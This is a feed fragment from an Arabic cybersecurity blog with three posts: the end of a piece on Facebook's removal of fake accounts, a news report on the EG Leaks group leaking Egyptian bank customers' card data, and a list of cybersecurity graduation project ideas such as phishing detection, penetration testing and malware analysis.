&lt;tr&gt;
&lt;td&gt;الربع الرابع 2017&lt;/td&gt;
&lt;td&gt;694&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الأول 2018&lt;/td&gt;
&lt;td&gt;583&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الثاني 2018&lt;/td&gt;
&lt;td&gt;800&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الثالث 2018&lt;/td&gt;
&lt;td&gt;754&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الرابع 2018&lt;/td&gt;
&lt;td&gt;1200&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الأول 2019&lt;/td&gt;
&lt;td&gt;نحو 2200&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الثاني 2019&lt;/td&gt;
&lt;td&gt;1500&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الثالث 2019&lt;/td&gt;
&lt;td&gt;1700&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الرابع 2019&lt;/td&gt;
&lt;td&gt;1100&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الأول 2020&lt;/td&gt;
&lt;td&gt;1700&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الثاني 2020&lt;/td&gt;
&lt;td&gt;1500&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الثالث 2020&lt;/td&gt;
&lt;td&gt;1300&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الرابع 2020&lt;/td&gt;
&lt;td&gt;1300&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الأول 2021&lt;/td&gt;
&lt;td&gt;1300&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;الربع الثاني 2021&lt;/td&gt;
&lt;td&gt;1700&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&quot;تأثيرات-عمليات-الإزالة&quot;&gt;تأثيرات عمليات الإزالة&lt;/h2&gt;
&lt;h3 id=&quot;لم-يشعر-أغلب-المستخدمين-بالتغيير&quot;&gt;لم يشعر أغلب المستخدمين بالتغيير&lt;/h3&gt;
&lt;p&gt;لعل أغلب المستخدمين (الطبيعيين) لم يشعروا بوجود شيء من هذه العمليات أو تأثيراتها.&lt;/p&gt;
&lt;p&gt;بينما أصحاب الصفحات العامة والمؤثرين وصانعي المحتوى الذين قاموا بدعم صفحاتهم &lt;strong&gt;“على حد زعمهم”&lt;/strong&gt; بأعداد مزيفة من المتابعين قد تأثر العدد لديهم وهذا سوف يؤثر مبدئياً على مدى وصول منشوراتهم كون خوارزمية الفيسبوك تعتمد بشكل شبه رئيسي على أعداد المتابعين إضافة لذلك فإن الإحصائيات تشير إلى انخفاض أعداد المستخدمين النشطين يومياً على منصة فيسبوك وهذا بسبب تلاشي “الذباب الإلكتروني = الحسابات المزيفة”&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;المستخدمون النشطون شهرياً ويومياً على فيسبوك: العدد يرتفع بينما يتراجع النمو السنوي من نحو 60% في 2011 إلى أقل من 10% في 2021&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.CAXGC4jI_Lk5cG.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;المستخدمين النشطين&lt;/em&gt;&lt;/p&gt;
&lt;h3 id=&quot;عدم-القدرة-على-الوصول-إلى-بعض-الحسابات&quot;&gt;عدم القدرة على الوصول إلى بعض الحسابات&lt;/h3&gt;
&lt;p&gt;إحدى تأثيرات عملية الإزالة هي عدم قدرة المستخدمين على الوصول الى الصفحة الرئيسية للحساب كما هو الحال أيضاً في بعض الصفحات العامة ذات الأعداد الهائلة من المتابعيين المزيفين&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;رسالة فيسبوك «هذه الصفحة غير متاحة الآن» مع زر إعادة تحميل الصفحة عند محاولة فتح صفحة محذوفة&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-03.CKSulYj5_1eNaQI.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;عدم القدرة للوصول&lt;/em&gt;&lt;/p&gt;
&lt;h3 id=&quot;الإغلاق-التام-للصفحات-العامة-المستنسخة&quot;&gt;الإغلاق التام للصفحات العامة (المستنسخة)&lt;/h3&gt;
&lt;p&gt;انتشرت في الآونة الأخيرة ثغرة في منصة فيسبوك تسمح للمستخدمين بالقيام باستنساخ الصفحات العامة كما هي أي:&lt;/p&gt;
&lt;p&gt;عدد المتابعين ذاته – المتابعين ذاتهم أيضاً – المنشورات ذاتها بحيث يقوم المستخدم بحذف جميع المنشورات وتغير اسم الصفحة العامة وبذلك قد حصل على عدد كبير من المتابعين بسهولة&lt;/p&gt;
&lt;p&gt;لكن الآن لا وجود للأسماء المزيفة واستغلال الثغرات حيث &lt;strong&gt;&lt;a href=&quot;https://about.fb.com/news/2021/03/how-were-tackling-misinformation-across-our-apps/&quot;&gt;ذكرت فيسبوك في تقرير&lt;/a&gt;&lt;/strong&gt; لها أن لديها أكثر من 35 ألف شخص يعملون على معالجة المعلومات الخاطئة على منصتها لكي يصبحوا قادرين وبدقة على تحديد الحسابات (عامة – شخصية) التي سيتم حذفها بشكل نهائي&lt;/p&gt;
&lt;h2 id=&quot;نصائح-مهمة&quot;&gt;نصائح مهمة&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;تجنب العمليات التسويقية المخادعة التي تخولك الحصول على أعداد متابعين بسرعة جداً&lt;/li&gt;
&lt;li&gt;قم باتباع خطة تسويقية جيدة وسوف تحصل على نتائج رغم الانتظار أو استشر مختص&lt;/li&gt;
&lt;li&gt;لاتقم بإنشاء أكثر من حساب فيسبوك للإستخدام الشخصي&lt;/li&gt;
&lt;li&gt;لا تسمح للأصدقاء أو أفراد عائلتك بالقيام بتسجيل الدخول لحسابتهم الشخصية على فيسبوك من خلال جهازك المحول أو حاسبك الشخصي&lt;/li&gt;
&lt;li&gt;في حال تعرض حسابك للإغلاق ولست على دارية كافية لإسترجاعه قم بإستشارة مختص&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;شاركنا رأيك بالتعليقات وأخبرنا فيما إذا كنت ضحية لخدعة زيادة أعداد المتابعين التي انتشرت بكثرة&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;وماهي أبرز النقاط التي تتمنى أن يقوم بها فيسبوك&lt;/strong&gt;&lt;/p&gt;
</content:encoded><category>الذكاء الاصطناعي والتقنية</category><category>فيسبوك</category><category>الحسابات المزيفة</category><category>Meta</category><category>المتابعون المزيفون</category></item><item><title>تسريب معلومات عملاء كبرى البنوك المصرية</title><link>https://blog.cyberpedia.site/egypt-leaks-financial-data/</link><guid isPermaLink="true">https://blog.cyberpedia.site/egypt-leaks-financial-data/</guid><description>مجموعة EG Leaks سرّبت بيانات دفع لعملاء كبرى البنوك المصرية على الويب المظلم وتلغرام. تعرّف على البيانات المسربة والبنوك المتأثرة ودافع المهاجمين.</description><pubDate>Thu, 06 Oct 2022 10:12:03 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;رصدت شركة Resecurity مجموعة تُدعى EG Leaks أو Egypt Leaks سرّبت على الويب المظلم وقناة تلغرام ملفات Excel تضم معلومات 12229 بطاقة ائتمان لعملاء بنوك مصرية كبرى مثل البنك الأهلي المصري وبنك مصر وHSBC مصر. شملت البيانات البريد الإلكتروني وعنوان الفواتير والاسم واسم البنك ونوع البطاقة، ويبدو أن الدافع مادي عبر ابتزاز العملاء أو البنوك.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;اكتشف باحثون في شركة الأمن السيبراني Resecurity مجموعة جديدة من المهاجمين تستهدف المؤسسات المالية في مصر&lt;/p&gt;
&lt;p&gt;لاحظت شركة Resecurity (وهي شركة للأمن السيبراني مقرها كاليفورنيا تقدم خدمات الحماية للشركات على مستوى العالم) مجموعة جديدة من المهاجمين تستهدف المؤسسات المالية في مصر، تتبع الجهة المنفذة للهجمات لحملة “EG Leaks” والمعروفة أيضاً باسم “Egypt Leaks”&lt;/p&gt;
&lt;p&gt;و بدأوا بتسريب كميات كبيرة من بيانات الدفع المخترقة الخاصة بعملاء البنوك المصرية الكبرى على شبكة الويب المظلم، تم الكشف عن أول ذكر لهذا النشاط في قناة عبر تطبيق تلغرام و التي تم إنشاؤها لتسريب ملفات Excel تحتوي على معلومات 12229 بطاقة ائتمان&lt;/p&gt;
&lt;p&gt;تتضمن البيانات المسربة معلومات تحديد الهوية الشخصية PII الخاصة بالعملاء المحتملين للبنوك الكبرى في مصر ، بما في ذلك البنك الأهلي المصري وبنك HSBC مصر وبنك الإسكندرية وبنك مصر وبنك الإسكندرية بالإضافة إلى Credit Agricole Egypt والعديد من البنوك الأخرى&lt;/p&gt;
&lt;p&gt;في حين أن بعض البيانات تبدو غير مكتملة، فقد تم التأكيد من احتواء البيانات على معلومات العديد من العملاء بتفاصيل صحيحة وتم الاتصال بهؤلاء العملاء بشكل فردي للتأكد من هذه المعلومات والتحقق من صحتها&lt;/p&gt;
&lt;p&gt;تحتوي البيانات المسربة على عنوان البريد الإلكتروني وعنوان الفواتير والاسم الأول واسم العائلة واسم البنك ونوع البطاقة، لم يشارك منفذو الهجوم الأرقام الخاصة بالبطاقات المسربة ولكن ومن خلال محادثة خاصة أظهر منفذو الهجوم مجالات أخرى تؤكد أن البيانات المسربة هي بيانات حقيقية وشرعية&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;إعادة رسم لإعلان بيع بيانات عملاء البنوك المصرية على منتدى في الويب المظلم: 134,525 سجلاً بسعر بين 0.30 و0.50 دولار للسجل، مع حجب البيانات الشخصية&quot; width=&quot;1600&quot; height=&quot;937&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.BggOf1Md_ZlxxE.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;من المحتمل أن يكون الدافع وراء تنفيذ هذا الأمر هو دافع مادي فقط بهدف الحصول على الأموال، من خلال تسريب هذه البيانات تحاول هذه الجهة ابتزاز العملاء المتضررين من المؤسسات المالية أو ابتزاز البنوك والمؤسسات المالية للحصول على الأموال بشكل مشابه لعمليات التفاوض الخاصة ببرمجيات الفدية&lt;/p&gt;
&lt;h2 id=&quot;الموقع-الجغرافي-لعملاء-البنوك-المتأثرين-بهذا-التسريب&quot;&gt;الموقع الجغرافي لعملاء البنوك المتأثرين بهذا التسريب&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;70% من القاهرة&lt;/li&gt;
&lt;li&gt;12% الاسكندرية&lt;/li&gt;
&lt;li&gt;8% أسوان&lt;/li&gt;
&lt;li&gt;7% الجيزة&lt;/li&gt;
&lt;li&gt;2% سوهاج&lt;/li&gt;
&lt;li&gt;1% الأقصر&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;بالإضافة إلى أن هذه التسريبات تحوي على معلومات العديد من العملاء من البحرين والمملكة العربية السعودية&lt;/p&gt;
&lt;p&gt;المعلومات المسربة ممكن أن تستخدم لسرقة الهوية الرقمية وعمليات الاحتيال المالي ولهذا السبب من المهم اتخاذ اجراءات سريعة وخطوات مناسبة للحد من المخاطر المحتملة&lt;/p&gt;
&lt;p&gt;وفقاً لمصادر متعددة، بدأت السلطات المصرية بالتحقيق في هذه الحادثة&lt;/p&gt;
</content:encoded><category>الأمن السيبراني</category><category>تسريب البيانات</category><category>البنوك المصرية</category><category>الويب المظلم</category><category>EG Leaks</category><category>سرقة الهوية</category></item><item><title>أفكار لمشاريع تخرج بمجال الأمن السيبراني</title><link>https://blog.cyberpedia.site/cyber-security-final-project-ideas/</link><guid isPermaLink="true">https://blog.cyberpedia.site/cyber-security-final-project-ideas/</guid><description>أفكار مشاريع تخرج في الأمن السيبراني مطلوبة في سوق العمل: الذكاء الاصطناعي لكشف التصيد، واختبار الاختراق، وتحليل البرمجيات الخبيثة، وSIEM Splunk.</description><pubDate>Mon, 26 Sep 2022 20:47:22 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;من أقوى أفكار مشاريع التخرج في الأمن السيبراني: تطبيق الذكاء الاصطناعي لكشف التصيد والبرمجيات الخبيثة والتسلل للشبكات، وتصميم بنية شبكة آمنة، وخطة استجابة للحوادث، واختبار اختراق الأنظمة والشبكات وتطبيقات الويب، وتحليل البرمجيات الخبيثة، والتحليل الجنائي الرقمي، واستخدام SIEM Splunk لكشف هجمات الفدية وAPT.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;في السنوات السابقة تصدرت حوادث الأمن السيبراني نشرات وعناوين الأخبار، خلف هذه الحوادث البارزة هناك في الخلفية حرب قائمة بين مجرمي الانترنت ومهندسي الحماية&lt;/p&gt;
&lt;p&gt;مع وصول العالم إلى آفاق جديدة في مجال تكنلوجيا المعلومات واعتمادنا على شبكة الانترنت في معظم مجالات حياتنا اليومية واعتماد معظم الشركات على تقديم الخدمات عبر الشبكة بالإضافة لعمليات البيع والشراء والعمل عن بعد، كل هذه الأمور جعلت الأمن السيبراني من أكثر المجالات طلباً حول العالم&lt;/p&gt;
&lt;p&gt;يعتبر مشروع التخرج بوابتك لسوق العمل لذا من المهم أن يكون هذا المشروع متعلق بالأمور المطلوبة من قبل الشركات في سوق العمل&lt;/p&gt;
&lt;p&gt;في هذا المقال سنقدم لك بعض الأفكار لمشاريع التخرج ضمن مجال الأمن السيبراني (تحديث للحصول على المزيد من الأفكار الفريدة لمشاريع التخرج تابع قناتنا على &lt;a href=&quot;https://t.me/cyber_fu&quot;&gt;التلغرام&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;في البداية لنقم بتعريف الأمن السيبراني&lt;/p&gt;
&lt;h2 id=&quot;ما-هو-الأمن-السيبراني&quot;&gt;ما هو الأمن السيبراني؟&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://blog.cyberpedia.site/what-is-cyber-security/&quot;&gt;الأمن السيبراني&lt;/a&gt; هو مجموعة الإجراءات والتدابير المتخذة لحماية الشبكات والبيانات المتبادلة عبرها من الاستخدام الغير مصرح به أو الاستخدام السيء لها&lt;/p&gt;
&lt;p&gt;وهذا الأمر يجب أن يتم:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;على المستوى الشخصي كحماية هويتك وبياناتك وأجهزتك عبر شبكة الانترنت&lt;/li&gt;
&lt;li&gt;على مستوى الشركات كحماية سمعة الشركة وبياناتها ومعلومات عملائها&lt;/li&gt;
&lt;li&gt;على مستوى الدول كحماية الأمن القومي وسلامة المواطنين&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;حاول أن يكون مشروعك غير مكرر ويقدم خدمة أو موضوع جديد يفتح لك أبواب سوق العمل وحاول تجنب الأفكار والمشاريع القديمة أو التقليدية والتي لم يعد لها تطبيق في يومنا الحالي كنمذجة أنظمة الاتصال أو الحساسات أو المشاريع الغبية الأخرى&lt;/p&gt;
&lt;p&gt;إليك بعض الأفكار القوية لمشاريع تخرج ضمن مجال الأمن السيبراني:&lt;/p&gt;
&lt;h2 id=&quot;تطبيق-الذكاء-الاصطناعي-في-الأمن-السيبراني&quot;&gt;تطبيق الذكاء الاصطناعي في الأمن السيبراني&lt;/h2&gt;
&lt;p&gt;يجد &lt;a href=&quot;https://blog.cyberpedia.site/what-is-artificial-intelligence/&quot;&gt;الذكاء الاصطناعي&lt;/a&gt; AI – Artificial Intelligence طريقه إلى الأمن السيبراني حيث أن استخدامه ينمو بشكل كبير من خلال الكشف الآلي والاستجابة للهجمات ومراقبة الشبكة والكشف عن نقاط الضعف والثغرات والعديد من الأمور الأخرى التي قد يتم فيها استخدام الذكاء الاصطناعي لتحسين عمليات الأمن السيبراني&lt;/p&gt;
&lt;p&gt;إليك بعض الأفكار لاستخدام الذكاء الاصطناعي في الأمن السيبراني:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;مراقبة حركة البيانات عبر الشبكة&lt;/li&gt;
&lt;li&gt;اكتشاف التهديدات الغير معروفة&lt;/li&gt;
&lt;li&gt;الحد من تكرار العمليات&lt;/li&gt;
&lt;li&gt;حماية أجهزة العقد النهائية&lt;/li&gt;
&lt;li&gt;تأمين عمليات المصادقة&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;يمكن للذكاء الاصطناعي القيام بالتحليل واكتشاف التهديدات التي يريدها متخصصو الأمن السيبراني لتقليل المخاطر والتهديدات وتعزيز الموقف الأمني نظراً لأن البشر لا يستطيعون مواكبة أسطح الهجوم المتغيرة باستمرار للشركات في يومنا الحالي، إليك المزيد من الأفكار:&lt;/p&gt;
&lt;h3 id=&quot;website-phishing-detection-model&quot;&gt;Website Phishing Detection Model&lt;/h3&gt;
&lt;p&gt;صنع أداة أو إعداد نظام لكشف هجمات التصيد Phishing باستخدام تقنيات نحاكي اللغات الطبيعية للآلة NLP.&lt;/p&gt;
&lt;p&gt;وظائفها: تحديد المحتويات الضارة في الرسالة، كشف مستوى الضرر المحتمل، تصنيف الرسائل أو حظرها مباشرة متضمنةً مراقبة الجهاز في الوقت الحالي Real-Time Monitoring.&lt;/p&gt;
&lt;h3 id=&quot;malware-detection-tool&quot;&gt;Malware Detection Tool&lt;/h3&gt;
&lt;p&gt;مع تزايد البرمجيات الخبيثة وتطورها بشكل هائل، أصبحت لها القدرة على تغيير ال Signature الخاص بها من خلال طبقات متعددة له، وتمثلها بعدة أشكال منه أو سواء بتحديث نفسها بشكل مستمر خلال فترات زمنية قصيرة، مما صعب هذا الأمر على مكافح الفيروسات اكتشافها.&lt;/p&gt;
&lt;p&gt;الهدف من هذه الأداة هو أن تكون طريقة جديدة لكشف هذه البرمجيات دون الاعتماد على ال Signature الخاص بها، وقدرته على تحديد أنماط هذه البرمجيات حتى وإن كانت جديدة لم يسبق وأن تم التعرف عليها من قبل.&lt;/p&gt;
&lt;h3 id=&quot;network-intrusion-detection-system&quot;&gt;Network Intrusion Detection System&lt;/h3&gt;
&lt;p&gt;تهدف هذه النظم إلى كشف التسللات التي تتم في الشبكة ورفع مستوى حمايتها عبر استخدام تعلم الآلة وخوارزمياتها أو حتى باستخدام Deep Learning (Decision Trees – SVM – KNN – Ensemble Methods).&lt;/p&gt;
&lt;p&gt;كما يمكن الاستفادة من قدرات الحوسبة السحابية لتسريع أداء هذه الخوارزميات بشكل كبير أو معالجة كميات ضخمة من البيانات أو لتعميمها على مستوى شبكة أوسع.&lt;/p&gt;
&lt;p&gt;خلال الأيام القادمة سيتم إضافة العديد من المصادر الخاصة بهذا الموضوع ضمن &lt;a href=&quot;https://cyberpedia.site&quot;&gt;موسوعة الأمن السيبراني&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;تصميم-وتنفيذ-بنية-تحتية-آمنة-للشبكة-لمؤسسة-أو-شركة-صغيرة&quot;&gt;تصميم وتنفيذ بنية تحتية آمنة للشبكة لمؤسسة أو شركة صغيرة&lt;/h2&gt;
&lt;p&gt;تصميم وتنفيذ بنية تحتية آمنة للشبكة لمؤسسة أو شركة صغيرة مع تطبيق كل إجراءات وطرق الحماية من خلال تقسيم الشبكة والتأكد من الاتصالات البعيدة وتطبيق عمليات المصادقة وتحديد الصلاحيات والمراقبة وضمان سرية وسلامة وتوافر البيانات المتبادلة عبر هذه الشبكة وتطبيق الحماية المادية لأجهزة الشبكة&lt;/p&gt;
&lt;h2 id=&quot;إعداد-خطة-للاستجابة-للحوادث-الأمنية&quot;&gt;إعداد خطة للاستجابة للحوادث الأمنية&lt;/h2&gt;
&lt;p&gt;أحد الأهداف الأساسية لأي برنامج حماية هو منع الحوادث الأمنية، على الرغم من الجهود التي يبذلها متخصصو تكنولوجيا المعلومات وخبراء الحماية إلا أن الحوادث ما زالت تقع باستمرار لذا من الضروري أن تكون الشركة أو المنظمة قادرة على الاستجابة لأي حادث والعمل على احتوائه.&lt;/p&gt;
&lt;p&gt;الهدف الأساسي من الاستجابة للحوادث هو التقليل أو الحد من التأثير الخاص بالهجوم او الحادثة الأمنية على المنظمة أو الشركة&lt;/p&gt;
&lt;p&gt;فكرة مميزة جداً أن يكون مشروعك حول إعداد وتطوير واختبار خطة الاستجابة للحوادث الأمنية لمنظمة أو شركة افتراضية، بما في ذلك إجراءات تحديد الحوادث الأمنية والاستجابة لها&lt;/p&gt;
&lt;p&gt;يمكنك الاستفادة من هذه الدورة المكتوبة السريعة: “&lt;a href=&quot;https://cyberpedia.site/course/incident-response/&quot;&gt;الاستجابة للحوادث الأمنية&lt;/a&gt;“&lt;/p&gt;
&lt;h2 id=&quot;تطوير-تطبيق-موبايل-آمن&quot;&gt;تطوير تطبيق موبايل آمن&lt;/h2&gt;
&lt;p&gt;تطوير تطبيق آمن للهواتف المحمولة يستخدم التشفير وطرق الاتصال الآمنة لحماية بيانات المستخدم مع تطبيق طرق مصادقة آمنة بدون كلمات سر (Passwordless Authentication)&lt;/p&gt;
&lt;h2 id=&quot;حماية-خدمات-الحوسبة-السحابية&quot;&gt;حماية خدمات الحوسبة السحابية&lt;/h2&gt;
&lt;p&gt;البحث عن حلول آمنة وتنفيذها للخدمات السحابية مثل Amazon Web Services (AWS), Microsoft Azure, or Google Cloud Platform (GCP)&lt;/p&gt;
&lt;h2 id=&quot;الحماية-الخاصة-بتقنية-blockchain&quot;&gt;الحماية الخاصة بتقنية Blockchain&lt;/h2&gt;
&lt;p&gt;البحث والتحقق من ميزات الحماية لمنصات العملات الرقمية التي تعتمد على blockchain واقتراح وايجاد حلول آمنة للمعاملات المشفرة&lt;/p&gt;
&lt;h2 id=&quot;الحماية-الخاصة-بأجهزة-انترنت-الأشياء-iot&quot;&gt;الحماية الخاصة بأجهزة انترنت الأشياء IoT&lt;/h2&gt;
&lt;p&gt;البحث عن حلول لتأمين أجهزة إنترنت الأشياء IoT – Internet of Things والشبكات المرتبطة بها وتطويرها&lt;/p&gt;
&lt;p&gt;يمكنك التركيز بشكل خاص على أجهزة انترنت الأشياء الخاصة بالرعاية الصحية IoT healthcare كونها تعاني من العديد من الثغرات والمشاكل الأمنية&lt;/p&gt;
&lt;h2 id=&quot;الهندسة-الاجتماعية&quot;&gt;الهندسة الاجتماعية&lt;/h2&gt;
&lt;p&gt;تقديم دراسة نظرية عن العوامل النفسية المستخدمة من قبل المهاجمين بهدف خداع الضحايا من خلال هجمات الهندسة الاجتماعية وتطبيق محاكاة عملية لهجمات التصيد الاحتيالي Phishing Attacks مع اقتراح حلول وطرق لاكتشاف هذه الهجمات واجراءات الحماية المرتبطة بها&lt;/p&gt;
&lt;p&gt;يمكنك الاستفادة من هذه الدورة المكتوبة السربعة “&lt;a href=&quot;https://cyberpedia.site/course/phishing-attack/&quot;&gt;هجمات التصيد الاحتيالي&lt;/a&gt;“&lt;/p&gt;
&lt;h2 id=&quot;التشفير-وفك-التشفير-وكسر-التشفير-بلغة-البايثون&quot;&gt;التشفير وفك التشفير وكسر التشفير بلغة البايثون&lt;/h2&gt;
&lt;p&gt;علم التشفير يعتبر من أهم الأمور التي يجب أن تتقنها للعمل في هذا المجال&lt;/p&gt;
&lt;p&gt;في كتاب “&lt;a href=&quot;https://books.cyberpedia.site/product/%d9%81%d9%83-%d8%a7%d9%84%d8%b4%d9%8a%d9%81%d8%b1%d8%a7%d8%aa-%d8%a7%d9%84%d8%b3%d8%b1%d9%8a%d8%a9-%d8%a8%d9%84%d8%ba%d8%a9-%d8%a7%d9%84%d8%a8%d8%a7%d9%8a%d8%ab%d9%88%d9%86/&quot;&gt;فك الشيفرات السرية بلغة البايثون&lt;/a&gt;” وهو كتاب مترجم من الكتاب الأصلي &lt;a href=&quot;https://inventwithpython.com/hackingciphers.pdf&quot;&gt;Hacking Secret Ciphers with Python&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;تم التطرق لكتابة أكواد بلغة البرمجة بايثون للقيام بعمليات التشفير ومن ثم فك التشفير ومن ثم كسر التشفير للخوارزميات البسيطة، يمكنك المتابعة مع الكتاب الأصلي للحصول على الأكواد الخاصة بهذه البرامج لخوارزميات التشفير المقعدة ويمكن أن يكون مشروعك باسم “التشفير وفك التشفير بلغة البايثون” أو “فك الشيفرات السرية بلغة البايثون”&lt;/p&gt;
&lt;h2 id=&quot;اختبار-اختراق-أنظمة-التشغيل-لينكس--ويندوز&quot;&gt;اختبار اختراق أنظمة التشغيل (لينكس – ويندوز)&lt;/h2&gt;
&lt;p&gt;عملية اختبار الاختراق هي محاكاة لأسلوب المهاجم الخبيث بهدف تقييم الوضع الأمني للأنظمة والعمل على اكتشاف نقاط الضعف بشكل استباقي واصلاحها قبل أن يتمكن المهاجم الخبيث من الوصول لها&lt;/p&gt;
&lt;p&gt;تعتبر هذه المهارة من أكثر المهارة المطلوبة من قبل معظم شركات أمن المعلومات حول العالم، لذا من المهم أن تبدأ بتعلم الأدوات والتقنيات المستخدمة في عمليات اختبار اختراق الأنظمة وتطبيق هذه السيناريوهات ضمن مشروع التخرج الخاص بك بشكل عملي مع شرح طرق الحماية الاستباقية والإجراءات المضادة&lt;/p&gt;
&lt;p&gt;يمكنك الاستفادة من كتاب “&lt;a href=&quot;https://books.cyberpedia.site/product/%d8%a7%d8%ae%d8%aa%d8%a8%d8%a7%d8%b1-%d8%a7%d8%ae%d8%aa%d8%b1%d8%a7%d9%82-%d8%a7%d9%84%d9%88%d9%8a%d9%86%d8%af%d9%88%d8%b2/&quot;&gt;اختبار اختراق الويندوز&lt;/a&gt;“&lt;/p&gt;
&lt;h2 id=&quot;اختبار-اختراق-الشبكات&quot;&gt;اختبار اختراق الشبكات&lt;/h2&gt;
&lt;p&gt;تعتبر حماية الشبكات من المهارات المطلوبة بشكل كبير جداً من معظم الشركات ولإتقان هذه المهارة يجب أن تكون قادر على فهم الهجمات وتطبيقها بشكل عملي لتتمكن من تطبيق الحماية الخاصة بها&lt;/p&gt;
&lt;p&gt;في هذا المشروع من الممكن أن تقوم بالعديد من هجمات الطبقة الثانية كهجمات:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;MAC Attacks&lt;/li&gt;
&lt;li&gt;DHCP Attacks&lt;/li&gt;
&lt;li&gt;ARP Spoofing&lt;/li&gt;
&lt;li&gt;DNS Spoofing&lt;/li&gt;
&lt;li&gt;VLAN Attacks&lt;/li&gt;
&lt;li&gt;STP Attacks&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;كل هذه الهجمات من الممكن أن يتم تنفيذها باستخدام أدوات جاهزة أو من خلال كتابة أكواد برمجية بلغة البايثون&lt;/p&gt;
&lt;p&gt;في هذا المشروع ممكن أن تقوم ايضاً بشرح وتطبيق طرق الحماية الخاصة بهذه الهجمات ضمن بيئة اختبار تجريبية آمنة&lt;/p&gt;
&lt;h2 id=&quot;تحليل-البرمجيات-الخبيثة&quot;&gt;تحليل البرمجيات الخبيثة&lt;/h2&gt;
&lt;p&gt;يعتبر هذا المجال من أكثر المجالات المطلوبة من قبل شركات الحماية وخاصة الشركات المصنعة لبرامج الحماية ومضادات الفيروسات، تبحث هذه الشركات عن أشخاص مختصين بتحليل البرمجيات الخبيثة لاكتشاف التقنيات والسلوك الخاص بهذه البرمجيات والتمكن من منعها من الوصول إلى الأنظمة والشبكات&lt;/p&gt;
&lt;p&gt;من المميز جداً أن تختار مشروع بهذا المجال وتقوم بشرح التقنيات والأدوات المستخدمة في عمليات الهندسة العكسية وتحليل السلوك وتنفيذ عمليات التحليل بشكل عملي&lt;/p&gt;
&lt;p&gt;قم بالاطلاع على كتاب “&lt;a href=&quot;https://books.cyberpedia.site/product/malware-analysis/&quot;&gt;تحليل البرمجيات الخبيثة&lt;/a&gt;” لمزيد من التعمق في هذا المجال&lt;/p&gt;
&lt;h2 id=&quot;التحليل-الجنائي-الرقمي&quot;&gt;التحليل الجنائي الرقمي&lt;/h2&gt;
&lt;p&gt;هو العلم الذي يجمع بين العلوم الشرطية الجنائية وعلوم الحاسب الآلي والهدف منه اكتشاف الأدلة الرقمية والتصدي للجرائم المعلوماتية&lt;/p&gt;
&lt;p&gt;ممكن أن تختار بيئة محاكاة تحوي على نظام قد تعرض للاختراق وتقوم بعمليات التحليل الجنائي الرقمي لاكتشاف كيف تمت هذه العملية وتعمل على استخراج الأدلة الرقمية وتشرح وتذكر الضوابط القانونية الخاصة بالأدلة الرقمية المقبولة من قبل المحكمة أو الجهات المسؤولة&lt;/p&gt;
&lt;p&gt;يمكنك الاستفادة من كتاب “&lt;a href=&quot;https://books.cyberpedia.site/product/%d8%a7%d9%84%d8%aa%d8%ad%d9%84%d9%8a%d9%84-%d8%a7%d9%84%d8%ac%d9%86%d8%a7%d8%a6%d9%8a-%d8%a7%d9%84%d8%b1%d9%82%d9%85%d9%8a/&quot;&gt;التحليل الجنائي الرقمي&lt;/a&gt;“&lt;/p&gt;
&lt;h2 id=&quot;اختبار-اختراق-سيرفرات-وتطبيقات-الويب&quot;&gt;اختبار اختراق سيرفرات وتطبيقات الويب&lt;/h2&gt;
&lt;p&gt;اختيارك لهذا المشروع سيفتح لك الأبواب للدخول لعالم اكتشاف الثغرات والربح المادي من خلال التبليغ عنها وهو مجال ممتع ومطلوب جداً من قبل معظم الشركات حول العالم&lt;/p&gt;
